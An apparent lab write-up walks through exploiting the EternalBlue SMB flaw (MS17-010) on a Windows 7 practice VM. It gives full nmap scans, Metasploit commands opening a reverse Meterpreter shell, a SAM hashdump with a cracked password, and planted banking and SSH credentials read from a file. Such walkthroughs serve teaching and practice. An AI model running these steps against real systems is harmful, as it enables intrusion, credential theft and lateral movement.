The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability."
You can read more about the exploit Wikipedia or Avast's Blog
You can download the lab for practice here
┌──(root💀kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:ab:08:1c, IPv4: 192.168.56.113
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0b (Unknown: locally administered)
192.168.56.100 08:00:27:42:95:84 PCS Systemtechnik GmbH
192.168.56.140 08:00:27:03:9c:8c PCS Systemtechnik GmbH
or
┌──(root💀kali)-[/home/kali]
└─# netdiscover -i eth0
Currently scanning: 192.168.129.0/16 | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0b 1 60 Unknown vendor
192.168.56.100 08:00:27:42:95:84 1 60 PCS Systemtechnik GmbH
192.168.56.140 08:00:27:03:9c:8c 3 180 PCS Systemtechnik GmbH
┌──(root💀kali)-[/home/kali]
└─# nmap -sC -sV -T4 192.168.56.140
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 08:59 EAT
Nmap scan report for 192.168.56.140
Host is up (0.0013s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:03:9C:8C (Oracle VirtualBox virtual NIC)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 9h39m58s, deviation: 2h53m12s, median: 7h59m57s
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:03:9c:8c (Oracle VirtualBox virtual NIC)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-10-29T09:00:42-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-10-29T14:00:42
|_ start_date: 2021-10-29T13:32:46
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.52 seconds
┌──(root💀kali)-[/home/kali]
└─# nmap -p445 --script smb-vuln-ms17-010 192.168.56.140
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 09:05 EAT
Nmap scan report for 192.168.56.140
Host is up (0.00088s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:03:9C:8C (Oracle VirtualBox virtual NIC)
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 19.06 seconds
Using Metasploit framework, we can successfully exploit this vulnerability as follows:
msf6 > search eternal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 2
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.56.140
RHOSTS => 192.168.56.140
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST eth0
LHOST => eth0
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.56.113:4444
[*] 192.168.56.140:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.56.140:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.56.140:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.56.140:445 - Connecting to target for exploitation.
[+] 192.168.56.140:445 - Connection established for exploitation.
[+] 192.168.56.140:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.56.140:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.56.140:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.56.140:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 192.168.56.140:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 192.168.56.140:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.56.140:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.56.140:445 - Sending all but last fragment of exploit packet
[*] 192.168.56.140:445 - Starting non-paged pool grooming
[+] 192.168.56.140:445 - Sending SMBv2 buffers
[+] 192.168.56.140:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.56.140:445 - Sending final SMBv2 buffers.
[*] 192.168.56.140:445 - Sending last fragment of exploit packet!
[*] 192.168.56.140:445 - Receiving response from exploit packet
[+] 192.168.56.140:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.56.140:445 - Sending egg to corrupted connection.
[*] 192.168.56.140:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.56.140
[*] Meterpreter session 2 opened (192.168.56.113:4444 -> 192.168.56.140:49157) at 2021-10-29 09:10:25 +0300
[+] 192.168.56.140:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.56.140:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.56.140:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
At this point, we have successfully gained a meterpreter shell on the target machine. We can explore it further as follows.
meterpreter > sysinfo
Computer : JON-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Meterpreter : x64/windows
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
232 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
304 296 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
352 296 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
360 344 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
388 344 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
448 352 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
456 352 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
464 352 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
556 448 svchost.exe x64 0 NT AUTHORITY\SYSTEM
636 448 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
708 448 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
724 448 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
768 448 svchost.exe x64 0 NT AUTHORITY\SYSTEM
792 448 svchost.exe x64 0 NT AUTHORITY\SYSTEM
864 448 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
932 448 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
952 448 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1140 1860 notepad.exe x64 1 Jon-PC\Jon C:\Windows\system32\NOTEPAD.EXE
1260 1860 calc.exe x64 1 Jon-PC\Jon C:\Windows\system32\calc.exe
1308 448 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1496 448 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1544 448 taskhost.exe x64 1 Jon-PC\Jon C:\Windows\system32\taskhost.exe
1628 556 slui.exe
1652 448 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1836 768 dwm.exe x64 1 Jon-PC\Jon C:\Windows\system32\Dwm.exe
1860 1828 explorer.exe x64 1 Jon-PC\Jon C:\Windows\Explorer.EXE
1916 448 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1948 1860 StikyNot.exe x64 1 Jon-PC\Jon C:\Windows\System32\StikyNot.exe
2012 448 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
meterpreter > screenshot
Screenshot saved to: /home/kali/YvvWwhbp.jpeg
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter >
As you can see from the above output, we can do lots of things, from getting the system information, listing processes running on the system, grabbing a screenshot of the users desktop and in the worst case scenario, dumping contents of the SAM database which contains hashes which we can crack and use the the credentials to move laterary on the target's network.
Cracked Jon's hash using an online cracking tool called Crackstation
We now have Jon's password : alqfna22
Enumerating the machine further, we can get access to senstive information
meterpreter > ls -la
Listing: C:\Users\Jon\Documents
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2021-10-29 16:41:37 +0300 Backups 2015
40777/rwxrwxrwx 0 dir 2021-10-29 16:41:31 +0300 Backups 2016
40777/rwxrwxrwx 0 dir 2021-10-29 16:41:22 +0300 Backups 2017
40777/rwxrwxrwx 0 dir 2021-10-29 16:41:15 +0300 Backups 2018
40777/rwxrwxrwx 0 dir 2021-10-29 16:41:00 +0300 Backups 2019
40777/rwxrwxrwx 0 dir 2021-10-29 16:40:54 +0300 Backups 2020
40777/rwxrwxrwx 0 dir 2021-10-29 16:40:38 +0300 Backups 2021
40777/rwxrwxrwx 4096 dir 2021-10-29 16:38:53 +0300 CLIENTS
100666/rw-rw-rw- 223 fil 2018-12-13 06:49:18 +0300 Confidential.txt
40777/rwxrwxrwx 0 dir 2018-12-13 06:13:31 +0300 My Music
40777/rwxrwxrwx 0 dir 2018-12-13 06:13:31 +0300 My Pictures
40777/rwxrwxrwx 0 dir 2018-12-13 06:13:31 +0300 My Videos
100666/rw-rw-rw- 402 fil 2018-12-13 06:13:45 +0300 desktop.ini
meterpreter > cat Confidential.txt
Banking Credentials
_________________________________
Username: Finance
Password: Password1234Amen
Server Login Credentials
_________________________________
ssh [email protected] -p 20021
Password: Admin@@2021
We can also upgrade our shell to a system command shell as follows where we see we are NT authority,a powerful account that has unrestricted access to all local system resources.
meterpreter > shell
Process 500 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Jon\Documents>whoami
whoami
nt authority\system
C:\Users\Jon\Documents>
Thanks for reading my writeup. If you have any questions, comments or would like to reach out to me:
